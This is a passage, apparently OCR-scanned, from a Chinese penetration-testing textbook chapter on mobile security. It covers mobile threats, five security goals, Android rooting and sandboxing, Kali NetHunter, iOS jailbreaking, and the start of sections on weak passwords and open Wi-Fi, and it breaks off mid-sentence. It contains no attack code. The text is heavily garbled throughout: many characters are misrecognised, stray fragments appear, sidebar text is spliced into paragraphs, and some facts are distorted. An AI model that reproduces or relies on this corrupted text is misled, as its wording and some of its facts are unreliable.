技术 保护 数据 的 设备 ， 通 常会 要 求 用 户 在 设备 上 应 用 密码 和 其 他 安全 功能 ， 这 些 功 能 要 求 
用 户 在 使 用 设备 之 前 输入 一 组 和 凭证。 由 于 大 多 数 用 户 认为 这 么 做 比较 矿 烦 ， 为 了 能 拿 起 设 
备 就 能 立刻 使 用 ， 他 们 可 能 会 选择 放弃 使 用 密码 和 加 密 。 当 然 ， 选 择 这 么 做 会 导致 设备 的 
安全 性 降低 。 

使 情况 更 加 复杂 的 是 ， 为 了 获得 相 较 于 竞 争 对 手 的 优势 ， 供 应 商 们 增加 了 功能 和 提高 
性 能 的 竞赛 。 随 着 这 些 年 移动 设备 的 功能 列表 不 断 增长 ， 出 现 了 倾 回 于 在 安全 性 方面 添加 
更 便利 的 功能 ， 或 者 至 少 使 安全 性 成 为 重点 。 

在 当前 的 移动 设备 市 场 中 ， 消 费 者 在 选 购 设 备 时 ， 有 四 种 可 供 选 择 的 移动 操作 系统 。 
这 四 种 主流 操作 系统 分 别 是 谷歌 的 Android、 苹 果 的 OS、 黑 共和 微软 的 Windows Mobile。 
在 这 四 种 操作 系统 中 ， 人 们 最 广泛 应 用 和 接触 的 两 个 操作 系统 分 别 是 谷歌 的 Android 和 苹 

有 ee 果 的 OS。 人 苹果 的 10S 专 用 于 苹果 设备 ， 并 针对 该 制造 商 自 号 
ewe wb 因 环境 进行 了 定制 和 调整 。 而 Android 则 可 被 定制 和 调整 为 任何 
为 它们 不 太 受 欢迎 。 考 虑 ” 类 型 的 环境 ， 只 要 有 足够 的 知识 和 时 间 。 在 这 两 种 操作 系统 
到 市 场 上 这 类 设备 的 总 ” 中， 谷歌 的 Android 在 市 场 上 占有 领先 地 位 。 

数 ， 过 到 这 些 设备 的 可 能 
性 相当 小 。 
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14.1.2 ”移动 设备 面临 的 威胁 


在 分 析 这 两 个 移动 操作 系统 时 ， 可 以 注意 到 ， 两 者 有 一 些 相似 之 处 ， 即 使 不 在 实现 层 
面相 似 ， 至 少 在 概念 层面 相似 ， 并 且 ， 某 个 移动 设备 遭遇 的 威胁 类 型 也 是 相同 的 ， 尽 管 受 
威胁 的 设备 不 同 。 考 虑 到 这 一 点 ， 了 解 以 下 问题 ， 以 便 理 解 开发 人 员 在 开发 时 思考 的 目标 
十 分 重要 。 

在 移动 设备 上 ， 部 分 最 基本 的 安全 问题 涉及 如 下 内 容 : 

恶意 软件 ”对 于 现在 使 用 计算 设备 的 人 来 说 ， 这 个 问题 并 不 陌生 ， 因 为 遇 到 恶意 软件 
及 其 危害 的 情况 可 谓 家 常 便 饭 。 众 所 周知 ， 恶 意 软件 导致 生产 力 受 损 、 信 息 失 窃 以 及 其 他 
形式 各 异 的 网 络 犯罪 ， 造 成 经 济 损失 。 借 鉴 从 传统 桌面 市 场 获得 的 经 验 教训 ， 移 动 系统 开 
发 人 员 力 图 保护 并 加 固 他 们 的 系统 免 受 恶意 软件 的 威胁 。 

资源 和 服务 可 用 性 滥用 “传统 技术 市 场 长 期 存在 的 一 个 问题 是 ， 对 于 任何 给 定 设备 
或 环境 的 有 意 使 用 或 滥用 ， 该 问题 在 移动 设备 市 场 同样 存在 。 行 为 不 正常 的 应 用 程序 或 
设计 不 佳 的 软件 很 容易 使 硬件 或 软件 效率 低下 或 不 稳定 ， 而 这 并 不 是 消费 者 期 望 的 。 另 
外 ， 在 移动 设备 上 使 用 行为 不 正常 的 软件 意味 着 仅 有 的 可 用 资源 会 很 快 耗 尽 。 在 某 些 情 
况 下 ， 这 意味 着 会 快速 消耗 电池 能 源 本 身 ， 从 而 使 得 整 台 设备 在 再 次 充电 之 前 成 为 一 块 
昂贵 的 废 铁 。 

恶意 和 无 意 的 数据 丢失 ”如 果 说 恶意 软件 教 给 了 我 们 什么 ， 那 就 是 以 身份 窃取 或 其 
他 信息 盗用 形式 发 生 的 恶意 数据 丢失 无 疑 是 个 问题 。 另 外 ， 由 于 消费 者 的 疏忽 或 者 滥用 设 
备 ， 导 致 信息 丢失 也 是 一 个 非常 现实 的 问题 ， 因 此 ， 开 发 人 员 采 取 了 措施 ， 以 确保 数据 免 
受 恶 意 和 意外 损害 。 

当然 ， 移 动 设备 还 会 遇 到 更 多 种 类 的 威胁 和 问题 ， 但 是 为 了 简单 起 见 ， 本 书 将 重点 关 
注 这 些 关键 领域 。 然 而 ， 可 以 肯定 ， 在 你 本 人 的 经 验 中 可 能 遇 到 过 很 多 问题 ， 甚 至 包括 本 
书 中 介绍 的 问题 ， 都 很 容易 转移 到 移动 环境 中 ， 并 且 为 这 些 设备 的 消费 者 造成 麻烦 。 


14.1.3 ”移动 安全 的 目标 


在 供应 商 设 计 设备 时 ， 会 在 功能 、 性 能 以 及 其 他 方面 有 很 多 目标 。 将 所 有 这 些 目 标 纳 
入 考虑 的 目的 ， 都 是 为 了 改进 其 设备 ， 并 与 竞争 对 手 的 设备 相 区 别 。 本 书 不 会 过 多 地 关注 
设备 的 易 用 性 ， 而 将 重点 关注 安全 功能 ， 以 及 可 能 促使 开发 人 员 在 适当 的 场合 ， 将 这 些 安 
全 功能 应 用 到 设备 的 因素 。 有 关 这 段 讨 论 务必 记 住 的 是 ， 总 体 目 标 是 在 任何 给 定 设 备 上 保 
护 消 费 者 数据 的 安全 ， 并 将 威 肋 和 漏洞 的 风险 降 到 最 低 。 在 许多 情况 下 ， 供 应 商 采 用 的 方 
法 干 变 万 化 ， 但 是 这 一 总 体 目标 不 会 变化 。 

那么 ， 大 多 数 移动 设备 供应 商 的 安全 目标 是 什么 呢 ? 对 于 任何 给 定 的 移动 设备 ， 需 要 
在 五 个 方面 开发 有 效 的 安全 措施 。 并 不 是 所 有 的 移动 设备 都 能 解决 这 五 个 问题 ， 但 是 ， 问 
题解 决 得 越 多 ， 设 备 台 越 安全 。 


在 此 首先 深入 讨论 这 五 个 问题 ， 并 在 接 下 来 分 析 Android 和 iOS 的 不 同系 统 架 构 时 应 用 
它们 。 
项 


为 制造 出 更 安全 的 移动 设备 ， 制 造 商 试图 解决 的 首 个 领域 是 访问 控制 。 移 动 设备 
上 的 访问 控制 。 在 概念 上 与 常规 操作 系统 和 服务 器 操作 系统 上 的 类 似 ， 意 味 着 是 
允许 还 是 拒绝 访问 ， 是 基于 一 系列 权限 和 规则 ， 这 些 权 限 和 规则 描述 了 某 个 特定 
群体 或 个 人 的 访问 级 别 。 正 确实 施 后 ， 访 问 控制 能 够 严格 规范 可 能 存在 的 与 任何 
系统 资源 、 应 用 程序 、 数 据 、 硬 件 和 系统 其 他 组 件 间 的 交互 操作 。 在 实践 中 ， 访 
问 控制 应 该 尽量 处 于 这 样 一 种 默认 状态 ， 其 中 任何 人 或 者 群体 都 不 能 执行 任何 操 
作 ， 除 非 已 经 显 式 或 隐 式 地 授予 了 他 们 该 操作 的 权限 ， 这 样 可 以 增强 系统 的 整体 
健壮 性 。 

第 二 个 供应 商 试图 解决 (并 在 过 去 15 年 中 ， 一 直 在 解决 其 在 不 同 操作 系统 中 的 不 同 
形式 ) 的 问题 ， 是 数字 签名 。 数 字 签 名 是 一 个 过 程 ， 在 该 过 程 中 ， 可 以 验证 诸如 
软件 之 类 项 目 来 目 某 个 来 源 ， 并 且 是 真实 可 信 的 。 对 现代 操作 系统 和 平台 而 言 ， 
这 是 一 个 非常 宝贵 的 功能 ， 因 为 它 可 以 确保 来 自 第 三 方 的 软件 或 其 他 项 目 确实 真 
实 可 信 ， 并 且 未 经 自 改 ， 以 期 尽量 降低 危及 系统 安全 性 和 稳定 性 的 可 能 。 在 实践 
中 ， 数 字 签 名 已 经 对 软件 精确 地 做 到 了 这 一 点 ; 许多 应 用 程序 是 由 其 开发 人 员 签 
名 确认 ， 这 为 软件 的 来 源 和 真实 性 判定 提供 了 一 种 方法 。 在 现代 操作 系统 中 ， 该 
技术 同样 用 于 为 设备 驱动 签名 ， 以 确保 设备 驱动 程序 来 自 于 一 个 有 效 来 源 ， 而 并 
非 由 第 三 方 创建 、 试 图 植 入 到 系统 中 以 进行 破坏 的 恶意 驱动 。 

设备 加 密 是 移动 设备 的 一 个 关键 组 件 。 加 密 是 一 种 机 制 ， 可 用 于 保护 数据 不 被 沪 
露 给 那些 未 得 到 查看 授权 者 。 加 密 还 可 确保 未 被 授权 方 没 有 修改 数据 的 权限 。 虽 
然 加 密 的 设计 目的 不 是 为 了 防止 设备 被 第 三 方 触 取 或 搜索 ， 但 是 它 提 供 了 一 种 保 
护 机 制 ， 可 以 防止 非 设备 所 有 者 查看 数据 并 且 可 能 访问 到 他 们 根本 无 权 访 问 的 秘 
密 。 值 得 一 提 的 是 ， 移 动 设 备 上 的 加 密 可 能 存在 法 律 问 题 ， 某 些 行业 有 相关 的 法 
律 规定 ， 这 些 规定 可 能 要 求 采 用 特定 类 型 和 级 别 的 加 密 ， 作 为 常规 安全 措施 的 一 
部 分 。 

在 过 去 的 几 年 中 ， 也 已 证 明 隔 离 是 设备 安全 性 的 一 个 重要 组 成 方面 ， 因 为 隔离 可 
以 显著 提高 设备 的 稳定 性 和 系统 上 各 种 进程 的 安全 性 。 隔 离 通过 限制 应 用 程序 或 
进程 对 其 他 应 用 程序 或 资源 的 访问 ， 保 护 系统 的 稳定 性 和 其 他 元 素 。 在 茶 些 方 
面 ， 隔 离 可 视 为 某 种 形式 的 访问 控制 ， 但 是 此 类 访问 控制 并 不 能 如 同 其 适用 于 任 
何 给 定 系统 上 运行 的 应 用 程序 一 样 ， 适 合 人 类 。 

最 后 ， 设 备 安 全 性 的 一 个 非常 重要 的 领域 是 使 用 权限 ， 提 供 对 系统 资源 的 细 粒 上 度 
访问 。 通 过 使 用 基于 权限 的 模型 ， 可 以 实现 一 个 系统 ， 该 系统 只 授权 用 户 执行 特 
定 任务 所 必需 的 操作 。 其 他 非 必要 操作 均 得 不 到 授权 ， 以 避免 给 用 户 提 供 过 多 访 
问 权 限 ， 并 给 设备 本 身 的 稳定 性 和 安全 性 融 来 潜在 风险 。 
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再 次 强调 ， 尽 管 上 文 可 能 无 法 涵盖 设备 制造 商 在 开发 其 设备 和 操作 系统 模型 时 努力 保 
护 的 所 有 领域 ， 但 它们 确实 代表 了 几乎 所 有 设备 供应 商都 要 考虑 的 一 些 关 键 领 域 。 


14.2 ”使 用 Android 操 作 系 统 


本 书 将 讨论 的 第 一 个 移动 操作 系统 是 Google 的 Android 操 作 系统 。 该 操作 系统 将 在 
2019 年 迎 来 它 的 1$ 岁 生日 : 它 最 早 由 一 家 名 为 Android Inc. 的 公司 开发 并 在 2003 年 发 布 。 
Android Inc. 的 独立 地 位 并 未 维持 多 久 ， 后 来 它 被 谷歌 收购 ， 因 为 谷歌 想 让 开发 Android 系 
统 的 精英 来 谷歌 工作 ， 帮 助 谷歌 完善 即将 回 市 场 发 布 的 新 Nexus 和 Android 设 备 产品 线 的 操 
作 系 统 ， 谷 歌 正 致 力 于 支持 推广 该 产品 线 。 

在 开发 者 最 初 设想 该 操作 系统 时 ， 其 理念 就 是 要 开发 一 个 开源 、 安 人 全、 稳定、 灵活 、 
第 三 方 易 于 开发 应 用 程序 的 操作 系统 。 从 最 初 发 布 到 今天 为 止 ，Android 操 作 系 统 已 在 
不 同 程度 上 达到 了 这 些 目标 ， 并 已 在 所 有 类 型 的 移动 设备 上 成 为 领先 的 操作 系统 。 因 为 
Android 操 作 系 统 功 能 丰富 、 功 能 强大 而 且 免 费 ， 消 费 者 纷纷 选择 使 用 它 。Android 操 作 系 
统 的 另 一 个 引 人 喜 爱 的 特性 是 ， 它 在 很 大 程度 上 基于 Linux 操 作 系 统 (包含 安全 增强 型 Linux 
内 核 [SELinux]))， 所 以 对 于 其 他 平台 上 的 Linux 的 用 户 ， 其 知识 和 技能 可 以 很 容易 地 转 用 于 
新 的 移动 环境 中 。Android 的 当前 版 本 6.0 版 的 染 构 如 图 14.1 所 示 。 
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在 过 去 十 年 中 ，Android 已 经 有 了 很 大 发 展 ， 加 入 了 对 更 多 设备 ， 以 及 几乎 所 有 主流 
在 线 服务 的 支持 ， 如 文件 共享 服务 、 云 服务 、 社 交 网 络 ， 甚 至 第 三 方 认 证 服务 。 

那么 ，Android 是 如 何 处 理 一 个 安全 移动 操作 系统 应 该 具备 的 五 个 要 素 呢 ? 与 iOS 相 
比 ，Android 得 分 相当 高 ; 它 能 够 通过 大 量 功能 特性 为 这 五 个 关键 方面 提供 支持 ， 而 1OS 系 
统 则 不 行 。 这 是 否 真 的 意味 着 Android 系 统 比 :OS 更 安全 ?所 有 这 一 切 意味 着 Android 操 作 
系统 确实 文 持 本 章 讨论 的 五 个 方面 的 安全 要 素 ， 就 此 而 言 ， 这 意味 着 它 比 其 竞争 者 可 能 更 
es 

一 个 能 进一步 提高 Android 操 作 系 统 的 安全 性 的 事实 是 ， 开 发 人 员 和 消费 者 使 用 各 
自 的 方式 与 系统 交互 ， 而 一 个 比 另 一 个 更 安全 。Android 是 针对 消费 者 市 场 而 开发 的 ， 因 
此 ， 其 界面 对 首次 使 用 的 用 户 而 言 也 很 简单 易 用 。 但 是 ， 开 发 人 员 可 以 局 用 系统 中 的 特殊 
模式 和 秘密 菜单 ， 用 于 执行 对 系统 一 般 用 户 不 可 见 的 敏感 操作 。 因 为 开发 工具 对 普通 用 户 
而 言 是 隐藏 的 ， 因 此 ， 用 户 不 会 对 系统 本 身 造 成 损害 。 


14.2.1 _ Android 系统 的 root 操 作 


当 一 个 普通 用 户 决 定 突破 设备 的 现存 限制 来 进行 更 多 的 操作 时 ， 又 会 怎么 样 呢 ? 这 
涉及 一 个 称 为 root 的 过 程 ， 该 过 程 可 用 于 将 任何 用 户 的 访问 权限 提高 到 最 高 级 。 在 root 完 
成 之 后 ， 系 统 的 用 户 可 以 几乎 无 限制 地 访问 系统 中 的 他 们 希望 与 之 交互 的 任何 事物 ， 并 且 
操作 权限 也 基本 上 没有 任何 限制 。 虽 然 这 么 做 听 起 来 似乎 是 个 好 主意 ， 但 对 大 多 数 人 而 言 
其 实 并 非 如 此 ， 因 为 普通 用 户 会 很 快 因为 尝试 一 些 (未 root 前 ) 通 常会 触发 警告 或 直接 被 禁 
止 的 高 风险 操作 ， 令 自己 陷入 麻烦 。 在 完成 root 之 后 ， 用 户 被 警告 或 者 禁止 的 次 数 要 少 得 
多 。 他 们 可 能 在 无 任何 预警 的 情况 下 损害 系统 本 号 。 

对 于 Android 设 备 ，root 到 底 是 指 什 么 ? 最 简单 的 解释 是 ，root 是 在 Android 设 备 上 运行 
一 个 进程 或 脚本 ， 如 果 该 应 用 按 预期 顺利 执行 ， 那 么 设备 就 会 被 解锁 并 被 root， 意 味 痢 用 
户 或 者 任何 使 用 这 人 台 设 备 的 人 都 能 够 随时 执行 任何 操作 。 由 于 通过 root 将 释放 设备 的 强大 
功能 ， 因 此 该 过 程 应 只 由 有 具备 足够 经 验 和 知识 的 人 员 进行 ， 以 避免 对 设备 的 安全 性 产生 负 
面 影响 。 

幸运 的 是 ，root 并 非 一 个 轻而易举 的 过 程 。 首 先 ， 需 要 进行 一 些 研究 和 一 些 努 力 才 能 
完成 它 。 不 过 ，root 一 台 设 备 所 需 的 知识 和 工作 量 并 不 一 定 ， 取 决 于 具体 需要 root 的 对 象 
设备 。 同 样 需要 注意 的 是 ， 不 当 或 不 正确 地 root 设 备 ， 不 仅 可 能 对 安全 性 产生 负面 影响 ， 
而 且 在 茶 些 情况 下 还 会 导致 设备 完全 无 法 操作 或 称 “ 变 砖 ”。 


14.2.2 ”在 沙 箱 中 操作 


Android 的 设计 与 其 他 操作 系统 的 设计 没有 太 大 的 区 别 。 虽 然 Android 与 其 他 操作 系统 
一 样 由 一 系列 进程 和 组 件 组 成 ， 但 是 它们 在 设备 和 操作 系统 本 身 中 的 实现 方式 方面 还 是 有 
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所 区 别 的 。 

Android 使 用 一 种 称 为 沙 箱 (sandbox) 的 设计 ， 强 调 组 件 和 流程 的 隔离 。 在 Android 环 境 
中 运行 的 每 个 组 件 都 被 尽 可 能 设计 为 自 包含 ， 并 且 只 以 非常 特定 的 方式 相互 通信 ， 使 用 特 
定 的 进程 以 控制 和 限制 交互 的 方式 。 这 种 设计 的 结果 是 ， 过 程 和 组 件 得 到 严格 的 控制 和 隔 
离 ， 除 非 他 们 有 特别 的 理由 需要 进行 通信 ; 即使 这 样 ， 其 通信 也 会 受到 控制 ， 以 防止 潜在 
的 安全 和 稳定 性 问题 。 虽 然 本 书 在 此 不 会 深入 探讨 这 一 设计 如 何 实现 的 核心 技术 细节 一 一 
这 是 开发 人 员 需 要 研究 的 问题 一 一 但 值得 之 处 ， 该 系统 已 在 进程 级 别 内 置 了 隔离 和 一 定 程 
度 的 访问 控制 。 

基于 限制 访问 的 对 象 不 仅 是 数据 ， 还 包含 系统 自身 的 组 件 的 访问 控制 的 角度 ， 在 
此 人 花 点 时 间 介 绍 一 下 Android 操 作 系 统 的 内 核 。 任 何 操作 系统 的 内 核 都 是 整个 系统 的 
“ 心 胜 ”， 负 责 调度 资源 ， 控 制 输入 输出 ， 以 及 控制 系统 中 的 其 他 必需 组 件 和 资源 。 对 
Android 而 言 ， 这 一 点 也 并 没有 什么 不 同 。 在 Android 系 统 中 ， 无 论 是 出 于 什么 意图 和 目 
的 ， 内 核 是 系统 中 唯一 具备 root 访 问 权 限 ， 能 够 执行 其 所 需 的 任何 操作 或 功能 的 部 分 。 这 
一 设计 的 结果 意味 着 内 核能 够 执行 其 所 需 的 操作 ， 以 维持 系统 的 正常 运行 和 功能 ， 而 这 正 
是 你 希望 内 核 为 正常 工作 所 应 该 具备 的 功能 ， 因 为 限制 这 样 一 个 系统 关键 部 分 的 访问 权限 
会 使 系统 无 法 正常 工作 。 当 然 ， 任 何不 属于 内 核 的 程序 只 能 以 某 种 较 有 限 的 访问 权限 运 
行 ， 取 决 于 其 特定 功能 和 在 系统 框架 内 的 角色 。 

下 面 简单 介绍 Android 操 作 系 统 的 其 他 一 些 组 件 : 

应 用 程序 运行 库 组 件 (Application Runtime ，ART) ART 是 Android 操 作 系 统 第 5 版 中 
引入 的 一 个 组 件 ( 并 成 为 其 后 所 有 版 本 的 组 成 部 分 )。 该 组 件 用 于 蔡 换 该 操作 系统 此 前 版 本 
中 的 比较 旧 的 Dalvx 玉 运行 库 。 该 组 件 的 基本 功能 是 使 应 用 程序 可 在 Android 中 的 一 个 虚拟 机 
环境 中 运行 。 对 于 熟悉 Java 环 境 的 人 而 言 ， 这 并 非 什么 特殊 情况 。 事 实 上 ， 大 多 数 Android 
应 用 程序 都 是 用 Java 语 言 编 写 的 ， 有 很 多 人 都 通过 使 用 Web 或 其 他 环境 中 的 应 用 程序 熟悉 
了 该 语言 。 

Google Play Android 操 作 系 统 的 一 个 主要 优点 是 ， 在 制造 商 发 货 时 操作 系统 中 尚未 
具备 的 任何 功能 都 可 以 在 事后 再 行 添加 。 为 Android 操 作 系 统 安装 应 用 程序 的 默认 和 首选 
的 方法 是 使 用 流行 的 Google Play 服务 ， 这 是 一 个 应 用 商店 ， 在 其 中 用 户 可 以 免费 或 花 很 少 
的 费用 下 载 应 用 程序 ， 并 将 其 安装 到 操作 系统 中 。 用 户 不 再 需要 备份 程序 安装 介质 的 副 
本 ， 或 将 应 用 程序 存储 在 USB 设 备 上 ; 他 们 可 以 简单 地 使 用 一 个 Google 账 户 ， 将 应 用 程序 
与 该 账户 相关 联 ， 然 后 按 需 进行 下 载 。 例 如 ， 在 他 们 换 用 新 设备 或 重 置 了 现 用 设备 ， 因 而 
必须 重新 配置 它们 时 。 

空中 无 线 下 载 (Over-the-Air ，OTA) 更 新 Android 操 作 系统 的 另 一 个 巨大 优点 是 其 提 
供 更 新 的 能 力 。 更 新 是 任何 操作 系统 环境 的 必需 组 成 部 分 ， 它 正 是 解决 安全 缺陷 或 其 他 问 
题 的 途径 。Android 系 统 更 新 可 大 可 小 ， 既 可 以 是 一 个 很 小 的 下 载 ， 也 可 以 是 整个 操作 系 
统 的 更 新 。Android 的 更 新 是 通过 所 谓 的 OTA 策 略 ， 或 利用 Wi-Fi 等 无 线 技术 ， 通 过 Web 途 
径 发 布 的 。 由 于 默认 情况 更 新 是 自动 交付 的 (或 许 会 提示 用 户 进 行 下载 和 安装 )， 这 就 使 相 
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比 于 以 前 的 操作 系统 ， 设 备 更 容易 保持 更 新 。 
目 Android 系 统 诞生 以 来 ， 已 证 明 其 是 一 个 赤 活 、 强 大 且 高 度 可 定制 的 操作 系统 ， 能 
够 跨 平 台 高 效 运行 。 


14.2.3 ”搭建 定制 的 Android 系 统 


己 经 确证 ， 谷 歌 提 供 的 Android 操 作 系统 的 默认 状态 擅长 于 为 用 户 提 供 展 好 的 体验 。 
然而 ，Android 无 法 满足 大 多 数 渗透 测试 者 的 需求 ， 因 为 系统 无 法 提供 高 效 的 测试 所 需 的 
足 量 的 可 访问 或 可 利用 的 资源 。 所 以 ， 作 为 一 名 渗透 测试 者 ， 通 常 还 需要 再 做 一 些 工作 ， 
使 系统 能 够 满足 自己 的 特殊 需求 。 为 做 到 这 一 点 ， 以 下 是 一 些 定制 系统 的 可 用 做 法 。 

第 一 种 做 法 是 使 用 设备 搭载 的 原生 操作 系统 ， 然 后 root 该 系统 。 由 于 这 个 过 程 开 放 了 
系统 权限 从 而 允许 使 用 该 设备 完成 任何 工作 ， 这 意味 看 将 能 够 执行 更 多 的 操作 ， 甚 至 在 
系统 上 安装 那些 没有 root 权 限 就 无 法 运行 的 应 用 程序 。 这 是 一 种 相当 简单 直接 的 做 法 ， 然 
而 ， 这 么 做 意味 着 仍然 必须 自行 搜集 用 于 执行 渗透 测试 过 程 的 工具 ， 而 大 多 数 情 况 下 这 将 
是 个 挑战 ， 因 为 此 类 工具 太 多 了 。 

另外 ， 也 可 以 选择 使 用 货架 产品 ， 例 如 Kali Linux NetHunter 之 类 预先 配置 好 的 操作 系 
统 。 该 操作 系统 是 彰 名 的 Kali 操 作 系 统 的 “ 表 兄 第 ”， 后 者 同样 用 于 渗透 测试 (不 过 是 在 
非 移 动 环境 中 )。 要 安装 此 操作 系统 ， 用 户 只 需要 在 https://www.kali.org 下 载 安 装 程序 。 在 
Windows 上 ， 该 程序 是 一 个 安装 回 导 ， 用 户 单 击 几 次 鼠标 ， 回 答 一 些 问 题 ， 然 后 ， 用 户 只 
需要 通过 USB 将 设备 插入 台式 机 或 笔记 本 电脑 ， 单 击 Finish 按 钮 ， 让 向导 用 新 的 操作 系统 
安装 和 配置 设备 。 男 外 ， 选 择 这 种 做 法 的 一 个 巨大 优点 是 ， 该 操作 系统 默认 搭载 7 超过 
1000 种 工具 ， 这 意味 着 有 一 个 经 过 实践 验证 的 工具 包 随 时 可 供 使 用 ， 而 不 需要 再 花 大量 时 
间 搜 索 有 用 或 有 效 的 工具 。Kali NetHunter 的 界面 如 图 14.2 所 示 。 


图 14.2”Kali NetHunter 的 界面 
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当然 ， 还 有 其 他 关注 安全 的 操作 系统 也 可 用 于 渗透 测试 ， 但 其 数量 太 多 ， 本 书 难 以 
一 一 费 述 。 不 过 ， 如 果 你 对 其 他 基于 Android 的 渗透 测试 发 行 版 选项 感 兴趣 ， 只 需要 一 次 
谷歌 搜索 ， 即 可 得 到 许多 相关 结果 ， 可 以 目 行 试验 ， 看 看 其 中 哪个 适合 你 :的 使 用 需求 


14.3 ”使 用 芋 果 iOS 


目前 第 二 流行 的 移动 操作 系统 是 苹果 的 iOS 系 统 。iOS 很 受 欢 迎 ， 因 为 对 于 任何 一 个 想 
拿 起 设备 就 用 的 人 而 言 ，iOS 都 是 易于 使 用 、 掌 握 与 导航 的 。iOS 很 像 Android， 能 够 在 苹 
果 上 自己 的 iPad 平 板 电脑 和 iPhone 上 运行 ， 但 苹果 环境 以 外 的 其 他 设备 都 无 法 运行 该 操作 系 
统 ( 这 一 点 与 Android 不 同 ， 即 使 它 因 源 自 Unix 而 和 Android 有 着 相似 的 传承 )。 苹 果 iOS 桌 面 
如 图 14.3 所 示 。 


图 14.3 ”苹果 10S 的 界面 


与 能 够 解决 前 述 所 有 五 个 安全 点 的 Android 不 同 ， 苹 果 的 OS 只 能 覆盖 前 文 定义 的 实现 
安全 移动 操作 系统 所 需 核 心 要 点 中 的 四 个 。 
苹果 的 OS 能 够 在 以 下 这 些 领域 提供 某 种 形式 的 保护 和 控制 : 
@ 访问 控制 ， 如 密码 、 账 户 锁定 甚至 授权 ; 
@ 应 用 数字 签名 ， 这 意味 着 从 苹果 自身 应 用 商店 这 样 的 来 源 所 安装 的 应 用 程序 已 经 
过 验证 与 检查 ， 以 保证 其 质量 ， 且 来 自 于 可 信 的 来 源 ; 
应 用 程序 加 密 功 能 ， 这 意味 着 应 用 程序 可 以 使 用 加 密 流 量 进行 通信 ， 并 且 存 储 在 
设备 上 的 数据 也 可 以 加 密 。 
@ 隅 离 ， 和 Android 系 统一 样 ， 这 是 iOS 的 核心 元 素 之 一 : 进程 和 应 用 程序 的 相互 通 
信和 是 在 规范 限制 之 下 的 ， 这 通常 能 降低 出 现 稳 定性 和 安全 问题 的 可 能 性 。 


值得 一 提 的 是 ， 和 Android 系 统 不 同 ， 苹 果 将 iOS 配 置 并 设计 为 只 允许 在 其 中 安装 来 自 
苹果 目 营 商店 的 应 用 程序 。 就 安全 性 和 软件 质量 而 言 ， 这 保证 了 只 有 安全 和 稳定 的 应 用 程 


序 才能 安装 到 设备 上 ， 而 任何 不 符合 标准 ， 或 未 通过 苹果 的 验证 审核 流程 的 程序 将 无 法 安 
装 。 但 有 时 你 可 能 碰 到 过 一 些 人 ， 他 们 的 设备 上 运行 着 并 非 来 自 人 苹果 商店 的 应 用 程序 。 那 
么 这 些 应 用 程序 从 何 而 来 ， 又 是 如 何 安装 到 在 设计 上 不 允许 其 安装 的 设备 上 的 ? 这 就 是 所 
谓 的 “越狱 (jailbreaking)”。 


iOS 越 狼 


简 而 言 之 ， 越 狱 就 是 root 的 过 程 ， 区 别 是 它 用 于 基于 苹果 1iOS 系 统 的 设备 。 在 一 个 
设备 越狱 之 后 ， 该 设备 即 可 越过 限制 ， 运 行 未 经 苹果 批准 的 应 用 程序 和 其 他 类 型 软件 ， 
也 即 允 许 设备 所 有 者 安装 他 们 从 任何 地 方 获取 的 任何 程序 。 事 实 上， 越狱 对 于 许多 的 设 
备 所 有 者 是 一 个 很 有 吸引 力 的 选择 ， 因 为 它 破除 了 限制 ， 允 许 他 们 掌握 其 设备 的 完整 控 
制 权 。 

当然 ， 与 Android 类 似 ， 越 狱 也 确实 带 来 一 个 问题 : 由 于 完全 可 能 安装 不 来 目 于 苹果 
商店 的 应 用 程序 ， 安 全 性 或 稳定 性 可 能 受到 损害 。 因 此 ， 只 有 以 下 这 些 人 才 应 该 尝试 

@ 了 解 设备 越狱 的 风险 的 人 ; 

@ 知道 在 安装 未 经 验证 的 软件 时 如 何 使 目 己 避免 及 烦 的 人 : 

@ 了 解 执行 特定 操作 的 后 果 的 人 。 

最 后 ， 作 为 本 节 的 注脚 提 一 句 : 越狱 一 一 就 像 root 一 样 一 一 是 导致 设备 失去 保修 的 最 
快捷 方式 ， 这 是 为 一 个 在 实施 这 两 种 操作 时 要 记 住 的 问题 。 


14.4” 含 找 移动 设备 中 的 安全 汤 阐 


移动 设备 带 来 了 便利 ， 但 是 其 上 自身 的 安全 漏洞 也 可 能 会 被 渗 透 测试 者 所 利用 。 与 许 
多 安全 问题 一 样 ， 很 多 移动 设备 安全 问题 可 以 通过 民 好 的 常识 和 适当 的 谨慎 避免 。 由 于 安 
装 来 目 未 知 或 未 经 验证 的 来 源 的 软件 带 来 的 风险 ， 可 以 通过 分 析 安 装 的 内 容 得 到 控制 。 吨 
外 ， 安 装 反 恶意 软件 之 类 的 软件 会 有 好 处 ， 因 为 它 能 降低 恶意 软件 ， 如 病毒 、 旦 
软件 和 其 他 破坏 系统 的 程序 相关 的 风险 。 


14.4.1 破解 移动 密码 


在 计算 机 和 技术 行业 中 ， 密 码 提供 的 保护 已 得 到 很 好 的 记录 和 理解 。 但 是 ， 仍 然 存 在 
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许多 未 正确 设置 密码 的 情况 ， 意 味 着 其 中 密码 太 短 、 没 有 使 用 各 种 字符 或 违反 其 他 复杂 性 
要 求 。 在 移动 环境 中 存在 另 一 个 问题 : 设备 上 往往 根本 没有 设置 密码 。 许 多 移动 设备 用 户 
仍然 习惯 于 不 设置 密码 :他们 认为 相对 于 拿 起 设备 后 只 需要 滑动 手指 或 单 击 按钮 就 能 开始 
使 用 的 需求 而 言 ， 设 置 密码 是 一 个 不 必要 的 障碍 。 他 们 的 观点 是 ，( 以 牺牲 安全 性 为 代价 ) 
获得 不 必 人 花费 片刻 输入 密码 就 立即 使 用 设备 的 便利 ， 是 一 种 很 好 的 折 中 。 令 缺失 密码 更 加 
危险 的 是 ， 委 失 的 设备 不 需要 通过 任何 质询 即 可 访问 。 考 虑 到 移动 设备 很 容易 丢失 ， 这 是 
一 个 巨大 的 风险 。 


14.4.2 ”寻找 不 党 保护 的 网 络 


移动 设备 的 一 个 问题 是 用 户 连 接 到 无 保护 或 未 知 无 线 网 络 的 趋势 。 移 动用 户 可 能 选择 
连接 到 他 们 不 了 解 或 不 控制 的 网 络 有 很 多 原因 。 例 如 ， 共 个 智能 手机 用 户 可 能 会 认为 ， 为 
何不 使 用 无 限 流 量 的 Wi-Fi 连 接 ， 而 要 使 用 (除非 无 限 流量 套餐 ) 宝 贵 的 流量 ? 虽然 该 动机 有 
一 定 踢 理 ， 但 连接 到 未 知 无 线 网 络 的 危险 是 巨大 的 。 连 接 到 未 知 的 无 线 网 络 完 全 有 可 能 和 号 
致 喘 份 被 盗 、 隐 私 泄 露 或 丢失 数据 和 其 他 形式 的 损失 。 因 此 ， 如 果 可 能 的 话 ， 移 动 设备 的 
